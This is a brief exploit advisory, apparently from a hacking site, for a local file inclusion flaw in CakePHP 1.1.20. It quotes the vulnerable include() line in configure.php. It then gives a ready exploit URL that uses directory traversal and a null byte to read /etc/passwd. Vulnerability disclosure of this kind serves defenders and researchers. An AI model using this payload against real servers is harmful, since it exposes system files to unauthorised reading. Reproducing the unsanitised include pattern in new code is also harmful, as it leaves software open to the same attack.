CakePHP version 1.1.20 suffers from a local file inclusion vulnerability.
27ead6119246b29233ad633ebe43ea62de1a3b3bd2aacf040b1811027299d69e
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ CakePHP 1.1.20 Local File Inclusion Vulnerability +
+ +
+ Discovered by Cru3l.b0y +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
###################################################################################################
AUTHOR : Cru3l.b0y
APPLICATION : CakePHP
VERSION : 1.1.20
DOWNLOAD : http://cakeforge.org/frs/download.php/677/cake_1.1.20.7692.tar.gz/donation=complete
VENDOR : http://cakeforge.org/
###################################################################################################
Vulnerable Code :
###################################################################################################
/cake/libs/configure.php
215 include(CONFIGS . $fileName . '.php');
[+]Exploit: http://[t4rg3t]/[p4th]/cake/libs/configure.php?fileName=../../../etc/passwd%00
###################################################################################################